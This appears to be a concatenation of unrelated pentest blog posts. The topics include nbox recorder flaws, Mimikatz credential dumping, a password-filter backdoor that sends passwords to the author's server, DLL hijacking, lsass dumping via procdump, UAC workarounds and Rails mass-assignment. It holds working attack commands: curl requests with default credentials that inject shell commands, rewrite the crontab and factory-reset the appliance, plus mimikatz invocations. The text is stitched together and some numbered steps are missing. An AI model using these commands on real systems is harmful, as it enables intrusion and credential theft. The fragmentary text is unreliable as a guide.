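A minimal sketch of the same idea, assuming msfconsole and a plain text file of workspace names (both file names here are placeholders, not the author's): generate one `workspace -d` line per workspace and feed the result back to msfconsole as a resource script.

```shell
# Hypothetical sketch: turn a list of workspace names into a Metasploit
# resource script that deletes each one. workspaces.txt is a placeholder.
printf 'client_a\nclient_b\n' > workspaces.txt   # stand-in for your real list

# One "workspace -d <name>" command per line.
while read -r ws; do
  echo "workspace -d $ws"
done < workspaces.txt > cleanup.rc

cat cleanup.rc
# then run it with: msfconsole -q -r cleanup.rc
```

Running msfconsole with `-r` executes each line as if typed at the prompt, so this deletes the listed workspaces (and their data) one by one.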

Security is a boomin', and so there are many different appliances to protect your network. Some of them do very little to protect; some of them open new holes in your network.

In line with best practice, many Security teams capture all network traffic using a variety of solutions, some closed, some open source. Once the traffic is stored, it can be used to detect badness, or just examine traffic patterns on corporate assets.

One of these open source options is NTOP, which of course has an appliance version, called nbox recorder. It goes without saying, if this traffic data were to be exposed, the consequences could be catastrophic. Consider stored credentials, authentication data, PII, internal data leakage...

PCAP or it didn't happen

You can either buy a ready-to-go appliance or, with some drudge work, build your own. Just get a license for nbox and put it on a Linux box; they are nice like that, providing all the repositories, and the steps are simple and easy to follow. Just spin up an Ubuntu VM and run:

BOOM! You are ready to go. Now you have an nbox recorder ready to be used. And abused! The default credentials are nbox/nbox, and access uses Basic Auth.

Before I continue, imagine that you have this machine capturing all the traffic of your network. Listening to all your corporate communications or production traffic and storing them on disk. How bad would it be if an attacker gets full access to it? Take a minute to think about it.

Uh-oh...

This level of exposure caught my eye, and I wanted to verify that having one of these sitting in your network does not make you more exposed. Unfortunately, I found several issues that could have been catastrophic in the hands of someone with malicious intent.

I do believe in the responsible disclosure process. However, after I repeatedly notified both ntop and MITRE, these issues were not given high priority or visibility. The following timeline details my disclosure communications:

Disclosure Timeline

12/27/2014 - Sent ntop details about some nbox vulnerabilities discovered in version 2.0
01/15/2015 - Asked ntop for an update about the vulnerabilities sent
01/16/2015 - ntop requested the details again, stating they may have been fixed
01/18/2015 - Sent the vulnerability details for a second time. Mentioned I would request CVEs
05/24/2015 - Asked ntop for an update about the vulnerabilities sent and to request CVEs
01/06/2016 - Noticed a new nbox version is out (2.3) and found more vulnerabilities. Old vulnerabilities are fixed. Sent ntop an email about the new issues and to request CVEs
01/06/2016 - Quick answer ignoring my request for CVEs and just asking for vulnerability details
01/28/2016 - Sent request for CVEs to MITRE, submitting a full report with all the issues and steps to reproduce
02/17/2016 - Asked MITRE for an update on the issues submitted
02/17/2016 - Reply from MITRE: "Your request is outside the scope of CVE's published priorities. As such, it will not be assigned a CVE-ID by MITRE or another CVE CNA at this time."

07/10/2016 - Noticed new nbox version (2.5) with partial fixes for some vulnerabilities in the previous (2.3) version

The ntop team initially refused to comment and silently fixed the bugs. MITRE then said this wasn't severe enough to warrant a CVE. As such, I have now chosen to highlight the issues here in an effort to have them remediated. I again want to highlight that I take this process very seriously, but after consulting with multiple other individuals, I feel that both the ntop team and MITRE have left me no other responsible options.

Here comes the paintrain!

*Replace NTOP-BOX with the IP address of your appliance (presuming that you already logged in). Note that most of the RCEs are wrapped in sudo so it makes the pwnage much more interesting:

RCE: POST against https://NTOP-BOX/ntop-bin/do_mergecap.cgi with the parameters:

opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit%200

curl -sk --user nbox:nbox --data 'opt=Merge&base_dir=/tmp&out_dir=/tmp/DOESNTEXIST;touch /tmp/HACK;exit 0' 'https://NTOP-BOX/ntop-bin/do_mergecap.cgi'

There are some other interesting things. For example, it was possible to get a persistent XSS by rewriting the crontab with an XSS payload in it, but they fixed that in 2.5. However the crontab overwrite (wrapped in sudo) is still possible:

GET https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_crontab.cgi?act_cron=COMMANDS%20TO%20GO%20IN%20CRON'

The last one is a CSRF that leaves the machine fried by resetting it completely:

GET https://NTOP-BOX/ntop-bin/do_factory_reset.cgi

curl -sk --user nbox:nbox 'https://NTOP-BOX/ntop-bin/do_factory_reset.cgi'

To make things easier, I created a Vagrantfile with provisioning so you can have your own nbox appliance and test my findings or give it a shot. There is more stuff to be found, trust me :)

https://github.com/javuto/nbox-pwnage

And you can run the checker.sh to check for all the above attacks. Pull requests are welcome if you find more!

(The issues were found originally in nbox 2.3 and confirmed in nbox 2.5.)

Modules for Metasploit and BeEF will come soon. I hope this time the issues are not just silently patched... If you have any questions or feedback, hit me up on twitter (@javutin)!

BlackHat 2016 is quickly approaching! Early registration ends on Friday, so you can save a few bucks and use the savings to go to Defcon 2016.

This year we have decided to split our Tactical Exploitation class into the two major platforms that are covered: Windows and UNIX. The classes are scheduled back to back, so if you sign up for both classes you will get the same Tactical Exploitation course. This decision came from feedback from students who only seemed to care about one platform or the other. We believe this is a mistake, since almost any enterprise environment will have both. So for those that only want one platform, you can certainly do that. Or if you want the original multi-platform class on our simulated enterprise environment, you can do that also.

All of our classes have a large hands-on component that we feel is essential to the learning experience and material retention. Students must bring their own laptop, but we provide a simulated enterprise infrastructure for the class exercises and additional challenges for the more advanced students. Many of our advanced students just love the opportunity to "play" in a fully functioning environment.

We would love for you to join us! These classes have already sold out twice, requiring us to move to bigger rooms. But at some point we cannot grow anymore. So sign up NOW! Save some money and reserve your spot!

Tactical Exploitation: Attacking Unix - July 30-31, 2016
Tactical Exploitation: Attacking Windows - Aug. 1-2, 2016

The clear training objectives (aka a plan to eventually get caught) for the Blue Team are what differentiate Purple Teaming from typical Red Teaming. By its very nature, Red Teaming makes a HUGE attempt not to get caught. You are pulling out all the tips & tricks and big boy tools NOT to get caught. With Purple Teaming, you have a plan to create an alert or event if the Red Team is not detected by the Blue Team during the engagement, so the Blue Team can test their signatures and alerting and exercise their incident response policies and procedures.

It isn't a "can you get access to X" exercise; it is a "train the Blue Team on X" exercise. The pentesting activities are a means to conduct realistic training.

A couple practical examples:

The Blue Team has created alerts to identify Sysinternals PsExec usage in the enterprise. The Red Team would at some point use PsExec to see if alerts fire off and the Blue Team can determine which hosts were accessed or pivoted from using PsExec. The Red Team could also make use of all the PsExec alternatives (winexe, msf psexec, impacket, etc) so the Blue Team could continue to refine and improve their monitoring and alerting.

Another scenario would be one where the Blue Team manager feels like the team has a good handle on the Windows side of things but less so on the OSX/Linux side of the house. The manager could dictate that the Red Team stay off Windows infrastructure, to identify gaps in host instrumentation and network coverage for *nix-type hosts and also to force incident response on OSX or Linux hosts.

Another example could be to require that the Red Team not utilize freely available Remote Access Trojans such as Metasploit or PowerShell Empire. Instead they could ask that the Red Team purchase (or identify a consultancy that already uses) something like Core Impact or Immunity's Innuendo, or find a consultancy that has its own custom backdoor to spice things up.

I thought it would be useful to make a post explaining the situation a little more in-depth.

Several colleagues (InGuardians, G-C Partners) and I have been engaged in related, high-impact incident response engagements over recent months.

We have been working together to correlate the results of several major investigations. At least three high-value corporations were hit by well-known APT actors over the holidays between December 2015 and January 2016. The targets in these attacks include:

In the past the primary goals of these actors seemed to be collecting information from targets and maintaining access while evading detection. In these new cases however, the attackers attempted to manually deploy crypto ransomware across large swaths of victim computers in addition to the typical APT tools. This is unusual because in the experience of all three information security firms, crypto ransomware is typically installed opportunistically by malicious websites and drive-by downloads, not manually by an intruder. Also this behavior has always been seen related to criminal activities, not intelligence gathering by nation states.

Before these latest intrusions, active attackers mass-installing crypto ransomware on major corporation computers had never been seen by any of the three companies performing the investigations. In the most recent occurrence the attacker made use of a much older breach to automatically deploy ransomware, further changing the methods seen and used.

This is also unusual because it seems to be in contradiction to the motivations that have been seen in the past. Typically, the motivation behind installing crypto ransomware has been that lone actors or crime rings are using basic phishing tactics to extort relatively small amounts of money from individuals or corporations. In contrast, the motivation for APT attacks has traditionally been considered to be nation state directed and focused on stealing valuable information without being detected. The dollar amounts targeted are in the millions.

THEORIES

We have come up with several theories:

After the fallout from the OPM hack, the Chinese government officially backed off from its hacking operations against the US. Numerous individuals who were employed as civilian contractors are now essentially out of work, but still have access to targets and toolsets. These individuals have started employing crypto-ransomware in order to replace lost government income and continue hacking.

This activity is either practice for, or the beginnings of a denial and disruption campaign against US companies. The actors don’t actually care about the money potential but rather are interested in the extensive disruption caused by the attacks.

The activities and motivations of APT actors haven’t changed, but rogue elements within their groups are employing these tactics and reusing existing infrastructure in order to acquire supplemental income.

In one case, the attackers used standard APT tools and techniques to move laterally and gain access to domain controllers, then used a GPO to push out the ransomware. Thankfully they made a small typo which caused it to fail. In another case they redirected monetary payments but, due to another small mistake, were caught before too much money was lost.

Due to confidentiality requirements with our clients, we can't post too many more details at this time, but will give updates as we can.

Attack Research, InGuardians, and G-C Partners are continuing to investigate the activity as it progresses. If you have seen similar activity and are willing to share details, please contact any of the three companies.

Well, maybe not Gold... but Litecoins, HoboNickels, Dogecoins, and other kinds of *coins*.

We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today but who knew...

Well, it's too late to get in the bitcoin game due to the difficulty of mining one being super high, but thankfully 60+ alternate crypto currencies have sprung up, and thanks to sites like www.cryptsy.com you can now trade those alternate currencies for BTC.

First we need to get to our iDevice's shell prompt. We will browse Cydia (which gets installed by default with the jailbreak) and install the openSSH package.

Once we get openSSH installed you can SSH into your device by finding its IP address in the Settings > Wireless Networks > Advanced ">" menu.
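As a quick sketch, the first session usually looks something like the following. The IP address and package name are placeholders, and the commands after `ssh` run on the device itself, so the sketch just prints the sequence (via `tee`, so it is safe to run anywhere):

```shell
# Hypothetical first-session checklist for a jailbroken iDevice.
# Printed rather than executed; tee keeps a copy in idevice_steps.txt.
cat <<'EOF' | tee idevice_steps.txt
ssh root@192.168.1.20     # default password on jailbroken iDevices: alpine
passwd                    # change the default root password immediately
apt-get update            # Cydia's APT also works from the command line
apt-get install wget      # placeholder; add Big Boss Tools / Erica Utilities via Cydia
EOF
```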

Now SSH into port 22 on that IP using the username "root" and the password "alpine". Once we have a shell we can use APT to install most of the other packages we need. Also, change the default root password to something else so people can't mess with your phone!

Arming your iDevice with *nix tools

To have a functioning *nix environment we need to install a ton of utilities that aren't usually installed as part of the default jailbreak or Bash shell. This includes utilities like strings, grep, awk, find, etc. Some of the utility packages do not say verbatim what's inside of them; things like Big Boss Tools and Erica Utilities. These two in particular install strings and other binutils-type tools, several of them patched or modded to work on the iOS (ARM) architecture.

Packages (some of these will be pre-installed with the JB):

Extras

In addition to utilities that help make our iDevice a functioning *nix environment, there are several tools that aid in connecting to, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations (some cut from my OWASP page):

Once you get all of these utilities and tools installed you're pretty much waiting on substrate to be working for iOS 7. After that's done you can install your favorite all encompassing or homegrown tool that uses substrate to do hooking such as Cycript, Inlyzer, SSLKillSwitch, Snoopit, IntroSpy, iAuditor, etc.

Then you just have to MitM the web traffic. There are plenty of guides on that around the net. If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments.

I've been here....work has kept me super busy...pretty sure there is a post in 2012 that says about the same. :-/

I attempted to recruit some smart people to make some posts, and they did, so thanks to all the guest bloggers this year.

so what's been up?

Well, I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmable RGB color ones. Facebook friends have been kept abreast of the situation. Two, stock trading... which I found out a fair number of hackers are into... which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until I die. See that post for a tiny bit more explanation.

I've been told by a few people that readers would probably find the xmas light stuff interesting as it does involve cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.

Anyway. Tech stuff... what's up?

Shitty passwords are what's up this year (totally new issue, right??!!!). I didn't go back and count, but a large majority of the tests I performed or assisted with this year where there was some sort of single-factor login portal (SSLVPN, Citrix, OWA, etc.) fell over to one of the following:

http://www.slideshare.net/chrisgates/lares-fromlowtopwned

It's 2013, almost 2014 as I write this; it's sad that we are still dealing with this like it's a new or unsolvable problem. It just reaffirms to me that we are failing as an industry if today we can break into an organization that spends any dollars on security with Password1. It's really no mystery why bad guys are beating the piss out of people.

Earlier this year a guy that does work on things in China gave a talk and described the Chinese cultural view on security like this (to paraphrase): "if an organization doesn't protect against stealing it, they must not care about it." Protecting your important **stuff** with Password1, or with a web application where any web vulnerability scanner finds SQL injection... yeah, it's no surprise when someone steals your *whatever*.

Grumpiness aside, we did do some neat shit this year. A pseudo highlight reel can be found in the string of talks that Chris Nickerson, Eric Smith, Mubix, and I gave at Derbycon this year.

Lares continues to break into hard to break into places using Red Teaming.

I also gave a talk at a credit union conference a few months ago where I tried to sum up how organizations are getting owned. TL;DR: it's all stuff we know about, but it takes work to fix, so not that many organizations do it.

I'd like to thank Joe McCray for recommending the book to me. I wish I had read it in my teens and/or my twenties. There are TONS of reviews of the book; I'd encourage everyone remotely interested to read a mix of the 5-star and 1-star ones to get a feel. I'll even drop the most important thing I got from the book here:

Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.

Pretty simple, right?! Unfortunately most of us (myself included) have been brought up to look at things like houses, cars, and other expensive things as assets, because we can sell them if we need to for $$. However, after being a former BMW owner and a current house owner, I can attest that the mentioned items did not *make* me any money. In fact the house is a constant source of cash outflow. This is exactly what the book talks about.

Now to be fair, and if you read the reviews this will come across, there is A LOT of magic hand waving on how one starts buying assets instead of liabilities and growing wealth. The author uses real estate, and mentions that you can start a business or build wealth via stocks/trading as other ways to accumulate assets. None of those, in my opinion, are quick, easy, or cheap to get started in, and none of them come without a hefty education requirement in order not to lose your starting capital. Nevertheless, the value in the book comes from identifying the differences in how poor people and rich people view and interact with money, as well as giving a general road map for a new way to think about building wealth.

thoughts?

CG

Again, this requires a very highly privileged account, which is no fun. I need these computer lists as part of my internal / post-exploitation recon, not as an end step.

For the longest time I relied on a very awesome tool called "Adfind":

adfind -sc computers_active -csv -nodn -nocsvq -nocsvheader

This command will output a list of computer accounts that have been active in the last 90 days in a straight line-by-line format (hence all of the no "this" and no "that" flags).
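Once you have that line-by-line list, it drops straight into other tooling. A small sketch (hosts.txt stands in for real adfind output; AD names are case-insensitive, hence the case-folding dedupe):

```shell
# Hypothetical post-processing of adfind output, e.g. from:
#   adfind -sc computers_active -csv -nodn -nocsvq -nocsvheader > hosts.txt
printf 'DC01\nFILE01\ndc01\n' > hosts.txt   # stand-in for real output

# Case-insensitive sort + dedupe; the result feeds your scanner of choice.
sort -fu hosts.txt > targets.txt
cat targets.txt
# e.g. nmap -iL targets.txt -p 445,3389 --open
```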

But that wasn't good enough, this image kept haunting me:

It's Active Directory Explorer by SysInternals. It shows the complete list of DNS records, stored as objects in Active Directory that I was able to get to as a basic domain user. This means all of the static DNS records for the unix systems and mainframes and other systems outside of the purely Windows world are there as well.

I spent 4 days attempting to write my own script, LDAP query, or prayer to get all of the data out, but was unsuccessful. On the 5th day I happened upon a very short post saying "I did it", much as I probably would have written it. It comes in the form of a PowerShell script that you can find here:

If you put a -csv on the end of those, the author has even given you the CSV format, which makes the output extremely easy to parse. Now you can throw your list into your tool of choice; instead of scanning random IP ranges on the target's network for important stuff, you can scan directly against known good hosts.

-- mubix

P.S. Yes, I realize this isn't actually a "Zone Transfer", but it's close enough.

clymb3r recently posted a script called "Invoke-Mimikatz.ps1". Basically, what this does is reflectively inject mimikatz into memory, call for all the logonPasswords, and exit. It even checks the target's architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt as so:

(This works REALLY well for Citrix and kiosk scenarios, though the one-liner is too hard to type/remember by hand.) This runs the powershell script by directly pulling it from Github and executing it "in memory" on your system. One of the awesome added capabilities of this script is the ability to run against a list of hosts, as so:
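The one-liners themselves are missing from this copy of the post. A commonly cited form looks like the following; treat it as a hedged reconstruction, and note the raw GitHub URL is an assumption (Invoke-Mimikatz later lived in PowerSploit's Exfiltration folder), not necessarily the exact path the author used:

```powershell
# Hedged reconstruction -- the original commands are not reproduced here.
# URL is an assumption; pull the script straight into memory, then dump creds.
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds

# Against a list of hosts (uses PowerShell Remoting under the hood):
Invoke-Mimikatz -ComputerName @('host1', 'host2') -DumpCreds
```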

This works great, as all the output lands directly on your system, all executed through PowerShell Remoting. PowerShell Remoting runs over WinRM. The service, however, is not enabled by default, and it can be pretty hit or miss how much any given enterprise uses WinRM. It is usually the servers and more important systems that have it enabled, more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service on port 47001 as well as the default comm ports for WinRM: 5985 (HTTP) and 5986 (HTTPS).
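nmap handles this fine (`nmap -p 5985,5986,47001 --open <range>`), but as a minimal sketch, bash can check the three ports on a single host by itself via its built-in /dev/tcp (the host and output file name are placeholders):

```shell
# Hypothetical quick check of the WinRM-related ports on one host,
# using bash's /dev/tcp pseudo-device instead of a scanner.
host="${1:-127.0.0.1}"                     # placeholder target
for port in 5985 5986 47001; do
  if timeout 2 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
    echo "$host:$port open"
  else
    echo "$host:$port closed"
  fi
done | tee winrm_sweep.txt
```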

If you find that your target isn't a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it "Mass Mimikatz"

Step 1. Make a share. We are doing this so we can not only collect the output of all our computers' passwords, but also host the CMD batch file that will run the powershell script:

We are setting "Everyone" permissions on the share (net share) and at the NTFS level (icacls) for this to work properly.

Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share, and the second gives null users the "Everyone" token so that we don't have to get crazy with our permissions. I have created a meterpreter script that has a bunch of error checking here: massmimi_reg.rb, or you can just make the following changes:
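The post doesn't name the keys at this point, but the behavior described matches two well-known values. A hedged sketch of the equivalent reg.exe commands, run on the victim (the share name "data" is a placeholder, and note both changes weaken the host's security):

```
REM Hedged sketch -- "data" is a placeholder share name, not the author's.
REM 1) Allow null sessions to connect to our share:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d data /f

REM 2) Give anonymous (null) users the Everyone token:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
```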

Step 6. Upload mongoose (Downloads Page - both the regular and tiny versions work). This is an awesome single-executable web server that supports Lua, SQLite, and WebDAV out of the box. The tiny version is under 100k.

Step 7. Upload serverlist.txt. This is a line-by-line list of computer names to run mimikatz against. You'll have to gather this one way or another.

Step 8. Execute mongoose (from the directory containing mimikatz.ps1). This starts a listener with directory listings enabled, on port 8080 by default.

Password Filters [0] are a way for organizations and governments to enforce stricter password requirements on Windows accounts than those available by default in Active Directory Group Policy. How to install and register password filters is also fairly well documented [1]. What it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages

with the name of a DLL (without the extension) that you place in Windows\System32\

For National CCDC earlier this year (2013), I created an installer and an "evil pass filter" that installed itself as a password filter; any time any password changed, it would store the change to a log file local to the victim (in clear text) as well as issue an HTTP basic auth POST, with the username and password, to a server I own.

The full code can be found below. I'll leave the compiling up to you, but basically it's slamming the code into Visual Studio, telling it it's a DLL, and clicking build for the architecture you are targeting. (Make sure to use the InternetOpen access settings that make the most sense for the environment you are using this in [2].)

So let's walk through the exploitation:

First, you have to be admin or system, as this is more of a persistence method than anything.

What you can't see here, since Metasploit isn't showing the line breaks, is that there are two entries there by default:

scecli
rassfm

We need to add ours to the end of this list. Unfortunately, at the current point in time it's impossible to do directly from the meterpreter command line (as far as I know), so we need to drop a .reg file and manually import it. The easiest way to do that is to add your "evilpassfilter" string, along with the entries already on the victim, to a VM you have and export it. It should look like this. Once we have our file, we upload and import it using the reg command:
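The import step itself is just (path and file name are examples):

```
C:\> reg import C:\Windows\Temp\evilpassfilter.reg
```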

This works from Windows 2000 and XP all the way up to Windows 8 & 2012.

Ok, but how often are local passwords changed? Maybe not that often, but guess what happens when a password filter is put on a domain controller: every password change handled by that DC is "verified" by your evil password filter. Oh, and what does that log file we talked about earlier look like on the victim if for some reason they block the IP you're sending your authentication to? (You would have to find a way to get back on that system, or make the log available via a share or otherwise.)

If you've ever used proxychains to push things through Meterpreter, one of the most annoying things is its "hardcoded" DNS setting of 4.2.2.2. If the org you are going after doesn't allow this out of their network, or if you are trying to resolve an internal asset, you're SOL. After a ton of googling, and annoyed head slams into walls every time I forget where this is, I've finally decided to make a note of it. There isn't much magic here other than knowing that this file exists: /bin/proxyresolv is a shell script that calls "dig" using TCP and the DNS server specified, so the lookup goes through proxychains. (On Kali Linux it's found here: /usr/lib/proxychains3/proxyresolv.) Here is what it looks like:

#!/bin/sh
# This script is called by proxychains to resolve DNS names

# DNS server used to resolve names
DNS_SERVER=4.2.2.2

Now you could just make the dig request yourself through proxychains and then throw whatever you originally intended directly at an IP, or you can make the DNS_SERVER change and hardcode your engagement's internal IP; up to you. But now it's documented, and I'll never have to go searching like crazy again... as long as I remember that it's on someone else's blog.

DLL hijacking is nothing new, and there are a number of ways to find the issue, but the best way I have found is a slightly more forceful method using a network share. First we need a network share that we can 1. monitor for every request, failed or not, and 2. allow ANYONE to access, because if the problem is with a service that runs as SYSTEM, it's not going to have credentials to authenticate against a share with more constrained permissions.

Step 1: Set up Samba w/ guest access

In /etc/samba/smb.conf add these two shares. (You also need to create the directories in /tmp.)
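A sketch of what those shares might look like (share names and paths are examples; guest access is the important part):

```ini
[tools]
   path = /tmp/tools
   guest ok = yes
   read only = yes

[logs]
   path = /tmp/logs
   guest ok = yes
   read only = no
```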

Step 2: Set PATH to the share

The PATH environment variable controls where the OS looks when someone, or some part of the OS, attempts to run something without its full path. For example, you probably don't type C:\Windows\System32\calc.exe every time you want calc to pop up (ok, bad example since you probably just double-click the shortcut, but you get the idea). It's the same on Linux: if someone types 'ls', the system does a quick check in all of the PATH directories for the 'ls' binary, stopping at the first instance it finds. So below in the screenshot you can see me adding our share to the very beginning of the PATH variable, using the ';' semicolon as a delimiter:
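For the current session that looks something like the following (share IP is an example; for the reboot test you'd make the same change to the machine-wide PATH via System Properties so it survives the restart):

```
C:\> set PATH=\\192.168.1.10\tools;%PATH%
```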

Step 3: Use a wireshark (smb) filter to find STATUS_OBJECT_NAME_NOT_FOUND messages

Now we need a way to monitor the requests as they happen. I initially tried using standard Samba logging turned all the way up to level 5; the problem was parsing and turnaround time. I found it easier to use wireshark.
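A display filter that narrows things down to the interesting responses (0xC0000034 is STATUS_OBJECT_NAME_NOT_FOUND; use the smb2.nt_status field instead if the client is speaking SMB2):

```
smb.nt_status == 0xC0000034
```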

The screenshot shows how you can add the "File name" field from the response and request packets as a column, to make it easier to scroll through as the requests go by. On a Windows 7 VM I have, when I reboot I get "oci.dll" as one of the DLLs requested:

Step 6: Get shell. System reboots...

Step 7: Next steps. Ok, but that requires a reboot. What other hijacking can I do? Start some programs and services, open file types, and just watch what is attempted to be loaded. If you see an EXE or DLL being requested from the share, rename your evil bin to match, and repeat whatever you did to cause the request.

This can result in persistence methods or sometimes privilege escalation, but be sure to test as much as possible, because if you override the loading of a critical DLL or executable, you may cause service disruption (anywhere from just a popup about a crash to a complete stall of the system).

Android App testing requires some diverse skills depending on what you're trying to accomplish. Some app testing is like forensics, there's a ton of server side stuff with web services, and there's also times when you need to show failings in programmatic protections or features which requires reversing, debugging, or patching skills.

To develop these skills you need some practice targets. Here's a list of all known Android security challenges, both app level vulns and crackme-type (RE/patching):

In some cases the write-up and challenge starter info is included; in other cases you might have to Google around, as some of these CTFs are old.

I tweeted about this blog post a few weeks ago and got to use it on a PT, so it's no secret...

Also, mubix beat me to this post, but I'm posting it here for my own note-keeping purposes.

First, check out this post by the mimikatz author. Now, one of the twitter comments I received was: "duh, anyone can right click and dump process memory to a file". Unfortunately I'm rarely sitting at a GUI where I can just "right click", but I usually do have the ability to "net use" and create scheduled tasks. The cool thing about AT jobs and scheduled tasks is that even if you schedule them as "admin" they actually run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.

So, quickly, here's how I've been doing it.

Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat
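The whole dance looks roughly like this (host, creds, and paths are examples; the .bat just wraps procdump's lsass dump so the AT job has a single thing to run):

```
C:\> net use \\TARGET\ADMIN$ /user:DOMAIN\admin P@ssw0rd
C:\> copy procdump.exe \\TARGET\ADMIN$\
C:\> copy procdump.bat \\TARGET\ADMIN$\
C:\> at \\TARGET 13:37 C:\Windows\procdump.bat

:: procdump.bat -- full memory dump of lsass for offline parsing
procdump.exe -accepteula -ma lsass.exe C:\Windows\lsass.dmp
```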

Why not just push up mimikatz? Well, the mimikatz you download is now tagged by AV (you can compile your own to get around that), and whitelisting tools should prevent mimikatz from running but will probably allow sysinternals tools or powershell. Mostly, though, this method means you don't need a meterpreter session or other type of interactive shell on the remote host: run the bat file, grab your dump file, and get creds offline.

------

If for some reason you want to run mimikatz via a bat file, you can use the following commands:
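Something along these lines (mimikatz accepts its commands as command-line arguments and runs them in order; the minidump variant parses your procdump output offline):

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt

:: or, offline against the lsass dump you collected:
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" > creds.txt
```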

I ended up using Method 2 on a recent test. The post above calls for an elevated command shell so you can call "at". This is easy if you are legitimately sitting in front of the box, but if you are pentesting, potentially harder.

Three scenarios:

user is a regular user and can't UAC to let you run admin commands

user is a local admin and UAC is disabled

user is a local admin but you have to bypass UAC

The easiest way, sitting in a command shell, is probably just to type "at":

ohh man, denied :-(

yay!

Scenario 1: you're screwed; you're gonna have to solve the not-admin problem first.

anger!

Scenario 2: no UAC... just follow the linked blog post. Get a copy of remote.exe (x86 or x64, whichever matches the architecture of the system you want to run it on) and do the following command:
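The shape of it is roughly as follows; remote.exe here means the one shipped with the Debugging Tools for Windows, and the exact syntax is an assumption on my part (check remote.exe /? first). You schedule remote.exe to wrap cmd.exe under a named session (the AT job runs it as SYSTEM), then connect to that session:

```
C:\> at 13:37 "C:\remote.exe /s cmd.exe mysession"
C:\> remote.exe /c HOSTNAME mysession
```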

1. It's now librex instead of rex; that should save you a few minutes of debugging the "can't find rex/proto" error :-)

2. Make sure you comment out the stuff Rob mentions here:

3. the ocra stuff works as described.

4. The exe option is important, as the metasploit psexec doesn't behave like the sysinternals psexec.

The exe needs to be a service binary, so you can't just call cmd.exe like you can with the sysinternals psexec. Normally metasploit uploads a service binary that kicks off your msf payload, so in this case you need a binary that behaves like a service. Rob gives us a hint with the one he uses in the example (adduser.exe).

So find yourself a service binary that does whatever you want it to do and use that with your standalone psexec. I ended up using an exe that created a local admin user, then used that account for follow-on stuff. Not optimal, but I was in a tight spot (hence using the standalone psexec to start with).

It is well known in the Rails world how big of an issue mass-assignment is. It is the vulnerability that led to the hack of GitHub last year. Normal interactions with an ActiveRecord model can lead to mass-assignment: an attacker can abuse Model.new or Model.update_attributes, etc. to change more attributes than the developer expected. The most obvious example is a column that defines a user's role. If an attacker is able to mass-assign this value, they could make themselves an admin. More information about mass-assignment is in a RailsCast linked below.
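Before the Rails specifics, the core problem can be shown in a few lines of plain Ruby (no Rails required, and the class here is purely illustrative): the constructor blindly copies every key from user-supplied params, so an attacker can set columns the developer never meant to expose.

```ruby
# A toy "model" whose constructor mass-assigns everything it is given.
class User
  attr_accessor :name, :admin

  def initialize(params = {})
    # mass-assignment: every key in params becomes a setter call
    params.each { |key, value| public_send("#{key}=", value) }
  end
end

# The developer expected only "name", but the attacker smuggles in "admin".
attacker = User.new("name" => "mal", "admin" => true)
attacker.admin  # true -- instant privilege escalation
```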

Creating a user without using mass-assignment.

An example of a mass-assignable create action.
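Sketched, the vulnerable version looks something like this (a Rails controller fragment, not runnable standalone): everything in params[:user] is handed straight to the model.

```ruby
def create
  # params[:user] may contain keys the developer never intended,
  # e.g. { "name" => "mal", "admin" => true }
  @user = User.new(params[:user])
  @user.save
end
```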

In Rails 2 and 3 to protect against mass-assignment you would set attr_accessible on your model. This would allow you to specify which attributes of a model could be mass-assigned.

Example model with attr_accessible set.
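Along the lines of (a Rails 3 model fragment):

```ruby
class User < ActiveRecord::Base
  # only :name may be mass-assigned; :admin and everything else is protected
  attr_accessible :name
end
```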

The example above will prevent mass-assignment of all attributes except for the name attribute. Hackers can no longer mass-assign themselves admin! When used correctly, this solution has done a good job of protecting Rails applications from mass-assignment. But while attr_accessible has proved to be a good solution to the issue, it's not as flexible as developers would like. There are times when you want to update all attributes of a model, like when an admin is updating a user's record. In those cases, developers would have to do funky things with :as => :admin scopes and pass additional parameters to ActiveRecord calls.

Complex models with varying authorizations would become hard to maintain. To address this and other issues, David Heinemeier Hansson (@dhh) created strong_parameters. strong_parameters tries to address the issue of mass-assignment in the controller instead of the model. It is available as a gem for Rails 2 & 3 and will be the default protection in Rails 4.

Creating user with strong_parameters enabled.
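A sketch of the strong_parameters version (a Rails controller fragment; the permitted attributes match the discussion that follows):

```ruby
def create
  # only :name and :admin survive the whitelist; everything else is filtered out
  @user = User.new(params.require(:user).permit(:name, :admin))
  @user.save
end
```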

Now, with strong_parameters, instead of defining attr_accessible on the model, you call .permit on the parameters you pass into an ActiveRecord call. As shown in the example above, we're permitting the assignment of name and admin (a boolean column). This protection is enabled on ActionController::Parameters. Many developers prefer this type of control to be in the controller, and it reduces the complexity of the model. RailsCasts has a great pro episode that covers how to use strong_parameters.

